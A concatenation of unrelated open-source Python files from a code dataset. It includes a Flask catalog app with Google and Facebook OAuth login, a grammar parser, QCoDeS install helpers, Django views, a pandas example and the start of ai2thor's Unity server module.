"resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json",
)
if osp.exists(new_res_path):
wprint("{} already exists! overriding!".format(new_res_path))
res_root = "output/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/"
iter_num_test = 4
pkl_paths = [
"01_02MasterChefCan/inference_model_final_wo_optim-2de2b4e3/ycbv_002_master_chef_can_train_real_uw/results.pkl",
"02_03CrackerBox/inference_model_final_wo_optim-41082f8a/ycbv_003_cracker_box_train_real_uw/results.pkl",
"03_04SugarBox/inference_model_final_wo_optim-e09dec3e/ycbv_004_sugar_box_train_real_uw/results.pkl",
"04_05TomatoSoupCan/inference_model_final_wo_optim-5641f5d3/ycbv_005_tomato_soup_can_train_real_uw/results.pkl",
"05_06MustardBottle/inference_model_final_wo_optim-6ce23e94/ycbv_006_mustard_bottle_train_real_uw/results.pkl",
"06_07TunaFishCan/inference_model_final_wo_optim-0a768962/ycbv_007_tuna_fish_can_train_real_uw/results.pkl",
"07_08PuddingBox/inference_model_final_wo_optim-f2f2cf73/ycbv_008_pudding_box_train_real_uw/results.pkl",
"08_09GelatinBox/inference_model_final_wo_optim-a303aa1e/ycbv_009_gelatin_box_train_real_uw/results.pkl",
"09_10PottedMeatCan/inference_model_final_wo_optim-84a56ffd/ycbv_010_potted_meat_can_train_real_uw/results.pkl",
"10_11Banana/inference_model_final_wo_optim-83947126/ycbv_011_banana_train_real_uw/results.pkl",
"11_19PitcherBase/inference_model_final_wo_optim-af1c7e62/ycbv_019_pitcher_base_train_real_uw/results.pkl",
"12_21BleachCleanser/inference_model_final_wo_optim-5d740a46/ycbv_021_bleach_cleanser_train_real_uw/results.pkl",
"13_24Bowl/inference_model_final_wo_optim-f11815d3/ycbv_024_bowl_train_real_uw/results.pkl",
"14_25Mug/inference_model_final_wo_optim-e4824065/ycbv_025_mug_train_real_uw/results.pkl",
"15_35PowerDrill/inference_model_final_wo_optim-30d7d1da/ycbv_035_power_drill_train_real_uw/results.pkl",
"16_36WoodBlock/inference_model_final_wo_optim-fbb38751/ycbv_036_wood_block_train_real_uw/results.pkl",
"17_37Scissors/inference_model_final_wo_optim-5068c6bb/ycbv_037_scissors_train_real_uw/results.pkl",
"18_40LargeMarker/inference_model_final_wo_optim-e8d5867c/ycbv_040_large_marker_train_real_uw/results.pkl",
"19_51LargeClamp/inference_model_final_wo_optim-1ea79b34/ycbv_051_large_clamp_train_real_uw/results.pkl",
"20_52ExtraLargeClamp/inference_model_final_wo_optim-cb595297/ycbv_052_extra_large_clamp_train_real_uw/results.pkl",
"21_61FoamBrick/inference_model_final_wo_optim-d3757ca1/ycbv_061_foam_brick_train_real_uw/results.pkl",
]
obj_names = [obj for obj in obj2id]
new_res_dict = {}
for obj_name, pred_name in zip(obj_names, pkl_paths):
assert obj_name in pred_name, "{} not in {}".format(obj_name, pred_name)
pred_path = osp.join(res_root, pred_name)
assert osp.exists(pred_path), pred_path
iprint(obj_name, pred_path)
# pkl scene_im_id key, list of preds
preds = mmcv.load(pred_path)
for scene_im_id, pred_list in preds.items():
for pred in pred_list:
obj_id = pred["obj_id"]
score = pred["score"]
bbox_est = pred["bbox_det_xyxy"] # xyxy
bbox_est_xywh = xyxy_to_xywh(bbox_est)
refined_pose = pred["pose_{}".format(iter_num_test)]
pose_est = pred["pose_0"]
cur_new_res = {
"obj_id": obj_id,
"score": float(score),
"bbox_est": bbox_est_xywh.tolist(),
"pose_est": pose_est.tolist(),
"pose_refine": refined_pose.tolist(),
}
if scene_im_id not in new_res_dict:
new_res_dict[scene_im_id] = []
new_res_dict[scene_im_id].append(cur_new_res)
inout.save_json(new_res_path, new_res_dict)
iprint()
iprint("new result path: {}".format(new_res_path))
| 1.695313 | 2 |
tests/test_app/rest_app/rest_app/services/account_service.py | jadbin/guniflask | 12 | 3446 | <filename>tests/test_app/rest_app/rest_app/services/account_service.py
from flask import abort
from guniflask.context import service
from ..config.jwt_config import jwt_manager
@service
class AccountService:
accounts = {
'root': {
'authorities': ['role_admin'],
'password': '<PASSWORD>',
}
}
def login(self, username: str, password: str):
if username not in self.accounts or self.accounts[username]['password'] != password:
return abort(403)
account = self.accounts[username]
token = jwt_manager.create_access_token(authorities=account['authorities'], username=username)
return {
'username': username,
'access_token': token,
}
def get(self, username: str):
if username not in self.accounts:
return abort(404)
return {
'username': username,
'authorities': self.accounts[username]['authorities']
}
| 2.28125 | 2 |
test/library/draft/DataFrames/psahabu/AddSeries.py | jhh67/chapel | 1,602 | 3447 | <gh_stars>1000+
import pandas as pd
I = ["A", "B", "C", "D", "E"]
oneDigit = pd.Series([1, 2, 3, 4, 5], pd.Index(I))
twoDigit = pd.Series([10, 20, 30, 40, 50], pd.Index(I))
print "addends:"
print oneDigit
print twoDigit
print
print "sum:"
print oneDigit + twoDigit
print
I2 = ["A", "B", "C"]
I3 = ["B", "C", "D", "E"]
X = pd.Series([0, 1, 2], pd.Index(I2))
Y = pd.Series([10, 20, 0, 0], pd.Index(I3))
print "addends:"
print X
print Y
print
print "sum:"
print X + Y
print
A = pd.Series(["hello ", "my ", "name", "is", "brad"])
B = pd.Series(["world", "real"])
print "addends:"
print A
print B
print
print "sum: "
print A + B
| 3.28125 | 3 |
nelly/parser.py | shawcx/nelly | 0 | 3448 | <gh_stars>0
#
# (c) 2008-2020 <NAME>
#
import sys
import os
import re
import logging
import nelly
from .scanner import Scanner
from .program import Program
from .types import *
class Parser(object):
def __init__(self, include_dirs=[]):
self.include_dirs = include_dirs + [ os.path.join(nelly.root, 'grammars') ]
self.pwd = []
# setup the scanner based on the regular expressions
self.scanner = Scanner(os.path.join(nelly.root, 'rules.lex'))
# container for the compiled program
self.program = Program()
self.tokens_stack = []
self.groups_stack = []
self.group_stack = []
self.groups = None
self.group = None
def Parse(self, grammarFile):
grammar = grammarFile.read()
self.pwd.append(os.path.dirname(grammarFile.name))
logging.debug('Parsing %s (%d bytes)', grammarFile.name, len(grammar))
self.tokens = self.scanner.Scan(grammar)
# keep a reference to the tokens for when included files are parsed
self.tokens_stack.append(self.tokens)
# iterate over all the tokens
while self.tokens:
(token,value,line,col) = self.tokens.Next()
# handle all the top-level tokens
if 'nonterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.NONTERMINAL, value)
elif 'varterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.VARTERMINAL, value)
elif 'include' == token:
self._include()
elif 'start_python_code' == token:
if r'<%pre' == value:
self.program.preamble.append(self._python_code('pre'))
elif r'<%post' == value:
self.program.postscript.append(self._python_code('post'))
else:
raise nelly.error('Please specify pre or post in code section')
elif 'start_comment' == token:
self._comment()
else:
raise nelly.error('Unhandled %s %s at %d:%d', token, repr(value), line, col)
self.tokens_stack.pop()
return self.program
def _nonterminal(self, _type, name):
# create a new container and add it to the program
nonterminal = Nonterminal(_type, name)
self.program.nonterminals[name] = nonterminal
(token,value,line,col) = self.tokens.Next()
# parse any optional arguments for the non-terminal
if 'lparen' == token:
while True:
(token,value,line,col) = self.tokens.Next()
if 'rparen' == token:
break
elif 'comma' == token:
continue
elif 'option' == token:
nonterminal.options.append(value)
if value == 'start':
self.program.start.append(name)
elif 'decorator' == token:
nonterminal.decorators.append(value[1:])
else:
raise nelly.error('Unknown option: %s %s', token, value)
(token,value,line,col) = self.tokens.Next()
if 'colon' != token:
raise nelly.error('Parse error, missing colon at line %d, column %d', line, col)
# parse zero or more expressions until a semicolon is found
self._expressions('pipe', 'semicolon', nonterminal)
def _expressions(self, delimiter, sentinel, nonterminal):
(token,value,line,col) = self.tokens.Peek()
expression = Expression((line,col))
while self.tokens:
(token,value,line,col) = self.tokens.Next()
if sentinel == token:
nonterminal.expressions.append(expression)
break
elif delimiter == token:
nonterminal.expressions.append(expression)
expression = Expression((line,col))
elif 'lparen' == token:
anonterminal = Nonterminal(Types.ANONYMOUS)
expression.Statement(Types.ANONYMOUS, anonterminal)
self._expressions('pipe', 'rparen', anonterminal)
elif token in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
quote = self._quote()
expression.Statement(Types.TERMINAL, quote)
elif token in ['start_single_bytes', 'start_double_bytes', 'start_triple_bytes']:
byte_quote = self._quote()
expression.Statement(Types.TERMINAL, byte_quote)
elif 'nonterminal' == token:
expression.Statement(Types.NONTERMINAL, value)
elif 'varterminal' == token:
expression.Statement(Types.VARTERMINAL, value)
elif 'backref' == token:
expression.Statement(Types.BACKREFERENCE, value)
elif 'function' == token:
functerminal = Nonterminal(Types.ANONYMOUS)
self._expressions('comma', 'rparen', functerminal)
expression.Statement(Types.FUNCTION, value[1:], functerminal)
elif 'reference' == token:
expression.Statement(Types.REFERENCE, value[1:])
elif 'constant' == token:
expression.Statement(Types.TERMINAL, value)
elif 'start_python_code' == token:
expression.code = self._python_code(nonterminal.name)
elif 'lbracket' == token:
try:
expression.Operation(Types.SLICE, self._slice())
except IndexError:
raise nelly.error('Applying slice to nothing at line %d, column %d', line, col)
elif 'lcurley' == token:
try:
expression.Operation(Types.RANGE, self._range())
except IndexError:
raise nelly.error('Applying range to nothing at line %d, column %d', line, col)
elif 'langle' == token:
expression.Weight(self._weight())
elif 'empty' == token:
pass
else:
raise nelly.error('Unhandled token "%s" at line %d, column %d', token, line, col)
def _quote(self):
# this will always be the quoted value
(token,value,line,col) = self.tokens.Next()
# this will always be the terminal quote
self.tokens.Next()
return value
#
# Slice a string
#
def _slice(self):
front = None
back = None
start = False
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
front = value
start = True
(token,value,line,col) = self.tokens.Next()
if 'rbracket' == token:
if False == start:
raise nelly.error('Empty slice at line %d, column %d', line, col)
return (front,front+1)
elif 'colon' != token:
raise nelly.error('Missing colon at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
back = value
(token,value,line,col) = self.tokens.Next()
elif 'rbracket' != token:
raise nelly.error('Missing ] at line %d, column %d', line, col)
return (front,back)
#
# Repeat a range
#
def _range(self):
lower = 0
upper = 0
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing range at line %d, column %d', line, col)
lower = value
upper = value
(token,value,line,col) = self.tokens.Next()
if 'rcurley' == token:
return (lower,upper)
elif 'comma' != token:
raise nelly.error('Missing comma at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
upper = value
else:
raise nelly.error('Missing range at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'rcurley' != token:
raise nelly.error('Missing } at line %d, column %d', line, col)
if lower > upper:
lower,upper = upper,lower
return (lower,upper)
def _weight(self):
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing weight at line %d, column %d', line, col)
(token,ignore,line,col) = self.tokens.Next()
if 'rangle' != token:
            raise nelly.error('Missing > at line %d, column %d', line, col)
return value
#
# Compile the Python into a code object
#
def _python_code(self, name):
(token,value,line,col) = self.tokens.Next()
values = [s for s in value.split('\n') if s.strip()] or ['']
        # save the whitespace of the first line
ws = re.compile(r'\s*').match(values[0]).group()
# check indentation
if [s for s in values if not s.startswith(ws)]:
raise nelly.error('Bad indentation in code block at line %d, column %d', line, col)
# strip and rejoin the code
codeblock = '\n'.join(s[len(ws):] for s in values)
# eat the end_python_code token
self.tokens.Next()
try:
return compile(codeblock, '<'+name+'>', 'exec')
except SyntaxError as e:
raise nelly.error('%d: %s: %s', e.lineno, e.msg, repr(e.text))
#
# Include other BNF files
#
def _include(self):
(token,value,line,col) = self.tokens.Next()
# file names are quoted
if token not in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
raise nelly.error('quoted file path expected')
# get the quoted value
path = self._quote()
# try opening the file in each include directory, ignore errors
content = None
for include_dir in self.pwd[-1:] + self.include_dirs:
try:
fullpath = os.path.join(include_dir, path)
content = open(fullpath, 'r')
logging.debug('Including file %s', repr(fullpath))
break
except:
continue
# if no file was found, throw an error
if None == content:
raise nelly.error('Could not load file %s', repr(path))
# ignore empty file
if not content:
return
# compile it inline
self.Parse(content)
self.pwd.pop()
# restore the current tokens
self.tokens = self.tokens_stack[-1]
#
# Multi-line comments
#
def _comment(self):
# consume and disregard the tokens
while True:
(token,value,line,col) = self.tokens.Next()
if 'start_comment' == token:
self._comment()
if 'end_comment' == token:
return
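# Illustrative usage sketch (hedged: the enclosing parser class is defined earlier in this
# file and its exact name is not visible here; 'grammar.bnf' is a hypothetical input file):
#
#   parser = Parser()                     # assumed constructor name
#   with open('grammar.bnf') as grammar:
#       program = parser.Parse(grammar)   # returns the compiled Program container
#   print(sorted(program.nonterminals))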
| 2.671875 | 3 |
qcodes/utils/installation_info.py | zhinst/Qcodes | 1 | 3449 | <filename>qcodes/utils/installation_info.py
"""
This module contains helper functions that provide information about how
QCoDeS is installed and about what other packages are installed along with
QCoDeS
"""
import sys
from typing import Dict, List, Optional
import subprocess
import json
import logging
import requirements
if sys.version_info >= (3, 8):
from importlib.metadata import distribution, version, PackageNotFoundError
else:
# 3.7 and earlier
from importlib_metadata import distribution, version, PackageNotFoundError
import qcodes
log = logging.getLogger(__name__)
def is_qcodes_installed_editably() -> Optional[bool]:
"""
Try to ask pip whether QCoDeS is installed in editable mode and return
the answer a boolean. Returns None if pip somehow did not respond as
expected.
"""
answer: Optional[bool]
try:
pipproc = subprocess.run(['python', '-m', 'pip', 'list', '-e', '--no-index',
'--format=json'],
check=True,
stdout=subprocess.PIPE)
e_pkgs = json.loads(pipproc.stdout.decode('utf-8'))
answer = any([d["name"] == 'qcodes' for d in e_pkgs])
except Exception as e: # we actually do want a catch-all here
log.warning(f'{type(e)}: {str(e)}')
answer = None
return answer
def get_qcodes_version() -> str:
"""
Get the version of the currently installed QCoDeS
"""
return qcodes.version.__version__
def get_qcodes_requirements() -> List[str]:
"""
Return a list of the names of the packages that QCoDeS requires
"""
qc_pkg = distribution('qcodes').requires
if qc_pkg is None:
return []
package_names = [list(requirements.parse(req))[0].name for req in qc_pkg]
return package_names
def get_qcodes_requirements_versions() -> Dict[str, str]:
"""
Return a dictionary of the currently installed versions of the packages
that QCoDeS requires. The dict maps package name to version string.
If an (optional) dependency is not installed the name maps to "Not installed".
"""
req_names = get_qcodes_requirements()
req_versions = {}
for req in req_names:
try:
req_versions[req] = version(req)
except PackageNotFoundError:
req_versions[req] = "Not installed"
return req_versions
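# Illustrative usage sketch (hedged: the return values below are made up and depend
# entirely on the local environment; only the function names come from this module):
#
#   >>> get_qcodes_version()
#   '0.26.0'
#   >>> is_qcodes_installed_editably()
#   False
#   >>> get_qcodes_requirements_versions()
#   {'numpy': '1.21.2', 'matplotlib': 'Not installed', ...}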
| 2.390625 | 2 |
documents/views.py | brandonrobertz/foia-pdf-processing-system | 0 | 3450 | <reponame>brandonrobertz/foia-pdf-processing-system<filename>documents/views.py
from django.shortcuts import render
from django.http import JsonResponse
from .models import FieldCategory
def fieldname_values(request):
if request.method == "GET":
fieldname = request.GET['fieldname']
query = request.GET.get('q')
q_kwargs= dict(
fieldname=fieldname,
)
if query:
q_kwargs['value__icontains'] = query
fc = FieldCategory.objects.filter(
**q_kwargs
).order_by("-count").values('value')
return JsonResponse(list(fc), safe=False)
elif request.method == "POST":
fieldname = request.POST['fieldname']
value = request.POST['value']
fc, created = FieldCategory.objects.get_or_create(
fieldname=fieldname,
value=value
)
return JsonResponse({'status': 'ok'})
def fieldname_value_count(request):
# just let it explode if people don't POST properly
fieldname = request.POST['fieldname']
value = request.POST['value']
fc = FieldCategory.objects.get(
fieldname=fieldname,
value=value
)
fc.count += 1
fc.save()
return JsonResponse({'status': 'ok'})
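# Illustrative request sketch (hedged: the URL paths are hypothetical, since the urlconf
# that routes to these views is not part of this file; 'agency' is a made-up fieldname):
#
#   from django.test import Client
#   client = Client()
#   client.get('/fieldname-values/', {'fieldname': 'agency', 'q': 'seattle'})
#   client.post('/fieldname-value-count/', {'fieldname': 'agency', 'value': 'Seattle PD'})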
| 2.34375 | 2 |
tests/test_provider_Mongey_kafka_connect.py | mjuenema/python-terrascript | 507 | 3451 | # tests/test_provider_Mongey_kafka-connect.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:11 UTC)
def test_provider_import():
import terrascript.provider.Mongey.kafka_connect
def test_resource_import():
from terrascript.resource.Mongey.kafka_connect import kafka_connect_connector
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.Mongey.kafka_connect
#
# t = terrascript.provider.Mongey.kafka_connect.kafka_connect()
# s = str(t)
#
# assert 'https://github.com/Mongey/terraform-provider-kafka-connect' in s
# assert '0.2.3' in s
| 1.867188 | 2 |
application.py | nicholsont/catalog_app | 0 | 3452 | from flask import Flask, render_template, request, redirect, jsonify, g
from flask import url_for, flash, make_response
from flask import session as login_session
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from models import Base, Category, Item, User
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
import requests
app = Flask(__name__)
# Retrieves client ID's and secrets from the json files
CLIENT_ID = json.loads(open('client_secrets.json', 'r')
.read())['web']['client_id']
APP_ID = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_id']
APP_SECRET = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_secret']
# Connect to Database and create database session
engine = create_engine('sqlite:///catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Login handler
@app.route('/login')
def showLogin():
"""JSON API to view entire catalog Information."""
return render_template('login.html')
# Third Party Oauth callback
@app.route('/oauth/<provider>', methods=['POST'])
def oauthLogin(provider):
"""
Retrieves provider to process oauth login.
params:(string) oauth provider
"""
if provider == 'google':
code = request.data
try:
# Upgrade auth code into credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json',
scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check for valid access token
access_token = credentials.access_token
url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \
'access_token={}'.format(access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Access token error handling
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = ' application/json'
return response
# Store access token in session
login_session['provider'] = 'google'
login_session['access_token'] = access_token
login_session['gplus_id'] = credentials.id_token['sub']
# Get user info
userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
params = {'access_token': login_session['access_token'], 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = json.loads(answer.text)
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
elif provider == 'facebook':
access_token = request.data
url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \
'fb_exchange_token&client_id={}&client_secret={}&' \
'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Strip expire tag from access token
access_token = result['access_token']
url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \
'name,id,email,picture'.format(access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Get user info
data = result
login_session['access_token'] = access_token
login_session['provider'] = 'facebook'
login_session['username'] = data['name']
login_session['email'] = data['email']
login_session['picture'] = data['picture']['data']['url']
login_session['facebook_id'] = data['id']
# Checks if user exists in DB
if getUserID(login_session['email']) is not None:
login_session['user_id'] = getUserID(login_session['email'])
else:
createUser(login_session)
login_session['user_id'] = getUserID(login_session['email'])
# Stores token in session
user = session.query(User).filter_by(email=login_session['email']).first()
token = user.generate_auth_token(600)
login_session['token'] = token
output = ''
output += '<h1>Welcome, {}!</h1>'.format(login_session['username'])
output += '<img src="{}" '.format(login_session['picture'])
output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \
'-webkit-border-radius: 150px;-moz-border-radius: 150px;">'
flash('Now logged in as {}'.format(login_session['username']))
return output
def createUser(login_session):
newUser = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(newUser)
session.commit()
def getUserID(email):
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except:
return None
# Revoke current user's token and reset login_session
@app.route('/logout')
def logout():
if 'provider' in login_session:
if login_session['provider'] == 'google':
del login_session['gplus_id']
if login_session['provider'] == 'facebook':
del login_session['facebook_id']
del login_session['access_token']
del login_session['username']
del login_session['picture']
del login_session['email']
del login_session['token']
flash("You have been successfully logged out.")
return redirect(url_for('showCatalog'))
else:
flash("No user has been logged in.")
return redirect(url_for('showCatalog'))
# JSON APIs to view Category Information.
@app.route('/catalog/JSON')
def catalogJSON():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
return jsonify(Categories=[c.serialize for c in categories],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/JSON')
def catalogCategoryJSON(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
return jsonify(Categories=[itemCategory.serialize],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/<item>/JSON')
def categoryItemJSON(category, item):
itemCategory = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=itemCategory.id).first()
return jsonify(Category=[itemCategory.serialize],
Item=[item.serialize])
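# Illustrative calls against the JSON API above (hedged: 'Snowboarding' and 'Goggles' are
# made-up catalog entries; only the URL patterns come from the three routes above):
#
#   GET /catalog/JSON                        -> all categories plus a few latest items
#   GET /catalog/Snowboarding/JSON           -> one category and its items
#   GET /catalog/Snowboarding/Goggles/JSON   -> a single item within a category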
# Show all Categories and the latest items
@app.route('/')
@app.route('/catalog')
def showCatalog():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
if 'token' not in login_session:
return render_template('publiccatalog.html',
categories=categories, items=items)
else:
return render_template('catalog.html',
categories=categories, items=items)
# Show Items in a category item
@app.route('/catalog/<category>/')
def showCatalogCategory(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategory.html',
items=items, category=itemCategory,
categories=categories)
else:
return render_template('category.html', items=items,
category=itemCategory, categories=categories)
# Show an item in a category
@app.route('/catalog/<category>/<item>/')
def showCategoryItem(category, item):
category = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=category.id).first()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategoryitem.html',
item=item, category=category,
categories=categories)
return render_template('categoryitem.html', item=item,
category=category, categories=categories)
# Create a new item
@app.route('/catalog/category/new/', methods=['GET', 'POST'])
def newCategoryItem():
if 'token' not in login_session:
return redirect('/login')
categories = session.query(Category).all()
user = session.query(User).filter_by(email=login_session['email']).one()
if request.method == 'POST':
category = session.query(Category).filter_by(
name=request.form['category']).first()
newItem = Item(name=request.form['name'],
description=request.form['description'],
category_id=category.id, user_id=user.id)
session.add(newItem)
session.commit()
flash('New Item {} Successfully Added'.format(newItem.name))
return redirect(url_for('showCatalog'))
else:
return render_template('newcategoryitem.html', categories=categories)
# Edit a category item
@app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST'])
def editCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
editedItem = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
categories = session.query(Category).all()
if user.id != editedItem.user_id:
flash('You are not authorized to edit {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=editedItem.name))
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
if request.form['description']:
editedItem.description = request.form['description']
if request.form['category']:
category = session.query(Category).filter_by(
name=request.form['category']).first()
editedItem.category_id = category.id
session.add(editedItem)
session.commit()
flash('Item Successfully Edited')
return redirect(url_for('showCategoryItem',
category=request.form['category'],
item=editedItem.name))
else:
return render_template('editcategoryitem.html',
category=categoryItem.name,
item=editedItem.name, categories=categories,
editedItem=editedItem)
# Delete a category item
@app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST'])
def deleteCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
itemToDelete = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
if user.id != itemToDelete.user_id:
flash('You are not authorized to delete {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=itemToDelete.name))
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
flash('Item Successfully Deleted')
return redirect(url_for('showCatalog'))
else:
return render_template('deletecategoryitem.html',
category=categoryItem.name,
item=itemToDelete.name)
if __name__ == '__main__':
app.secret_key = 'N10kuN!'
app.debug = True
app.run(host='0.0.0.0', port=5000)
| 2.46875 | 2 |
noo/impl/utils/__init__.py | nooproject/noo | 2 | 3453 | from .echo import echo, set_quiet
from .errors import NooException, cancel
from .store import STORE, FileStore, Store
__all__ = (
"FileStore",
"NooException",
"Store",
"STORE",
"cancel",
"echo",
"set_quiet",
)
| 1.304688 | 1 |
ai2thor/server.py | aliang8/ai2thor | 1 | 3454 | <filename>ai2thor/server.py<gh_stars>1-10
# Copyright Allen Institute for Artificial Intelligence 2017
"""
ai2thor.server
Handles all communication with Unity through a Flask service. Messages
are sent to the controller using a pair of request/response queues.
"""
import json
import logging
import sys
import os
import os.path
try:
from queue import Empty
except ImportError:
from Queue import Empty
import time
import warnings
from flask import Flask, request, make_response, abort
import werkzeug
import werkzeug.serving
import werkzeug.http
import numpy as np
from enum import Enum
from ai2thor.util.depth import apply_real_noise, generate_noise_indices
logging.getLogger('werkzeug').setLevel(logging.ERROR)
werkzeug.serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
MAX_DEPTH = 5000
# get with timeout to allow quit
def queue_get(que):
res = None
while True:
try:
res = que.get(block=True, timeout=0.5)
break
except Empty:
pass
return res
class NumpyAwareEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.generic):
            return obj.item()  # np.asscalar was removed from newer NumPy; .item() is the equivalent
return super(NumpyAwareEncoder, self).default(obj)
class BufferedIO(object):
def __init__(self, wfile):
self.wfile = wfile
self.data = []
def write(self, output):
self.data.append(output)
def flush(self):
self.wfile.write(b"".join(self.data))
self.wfile.flush()
def close(self):
return self.wfile.close()
@property
def closed(self):
return self.wfile.closed
class ThorRequestHandler(werkzeug.serving.WSGIRequestHandler):
def run_wsgi(self):
old_wfile = self.wfile
self.wfile = BufferedIO(self.wfile)
result = super(ThorRequestHandler, self).run_wsgi()
self.wfile = old_wfile
return result
class MultiAgentEvent(object):
def __init__(self, active_agent_id, events):
self._active_event = events[active_agent_id]
self.metadata = self._active_event.metadata
self.screen_width = self._active_event.screen_width
self.screen_height = self._active_event.screen_height
self.events = events
self.third_party_camera_frames = []
# XXX add methods for depth,sem_seg
@property
def cv2img(self):
return self._active_event.cv2img
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def read_buffer_image(buf, width, height, flip_y=True, flip_x=False, dtype=np.uint8,
flip_rb_colors=False):
im_bytes = np.frombuffer(buf.tobytes(), dtype=dtype) if sys.version_info.major < 3 \
else np.frombuffer(buf, dtype=dtype)
im = im_bytes.reshape(height, width, -1)
if flip_y:
im = np.flip(im, axis=0)
if flip_x:
im = np.flip(im, axis=1)
if flip_rb_colors:
im = im[..., ::-1]
return im
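# Illustrative example (hedged: a tiny made-up 2x2 RGB buffer, not real Unity output):
#
#   raw = bytes(range(12))
#   img = read_buffer_image(raw, width=2, height=2)
#   img.shape   -> (2, 2, 3); rows are flipped vertically because flip_y defaults to True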
def unique_rows(arr, return_index=False, return_inverse=False):
arr = np.ascontiguousarray(arr).copy()
b = arr.view(np.dtype((np.void, arr.dtype.itemsize * arr.shape[1])))
if return_inverse:
_, idx, inv = np.unique(b, return_index=True, return_inverse=True)
else:
_, idx = np.unique(b, return_index=True)
unique = arr[idx]
if return_index and return_inverse:
return unique, idx, inv
elif return_index:
return unique, idx
elif return_inverse:
return unique, inv
else:
return unique
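# Illustrative example (hedged: toy input, not actual segmentation data):
#
#   a = np.array([[1, 2], [1, 2], [3, 4]])
#   unique_rows(a)                       -> array([[1, 2], [3, 4]])
#   unique_rows(a, return_inverse=True)  -> (array([[1, 2], [3, 4]]), array([0, 0, 1]))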
class Event(object):
"""
Object that is returned from a call to controller.step().
This class wraps the screenshot that Unity captures as well
as the metadata sent about each object
"""
def __init__(self, metadata):
self.metadata = metadata
self.screen_width = metadata['screenWidth']
self.screen_height = metadata['screenHeight']
self.frame = None
self.depth_frame = None
self.normals_frame = None
self.flow_frame = None
self.color_to_object_id = {}
self.object_id_to_color = {}
self.instance_detections2D = None
self.instance_masks = {}
self.class_masks = {}
self.instance_segmentation_frame = None
self.class_segmentation_frame = None
self.class_detections2D = {}
self.process_colors()
self.process_visible_bounds2D()
self.third_party_camera_frames = []
self.third_party_class_segmentation_frames = []
self.third_party_instance_segmentation_frames = []
self.third_party_depth_frames = []
self.third_party_normals_frames = []
self.third_party_flows_frames = []
self.events = [self] # Ensure we have a similar API to MultiAgentEvent
@property
def image_data(self):
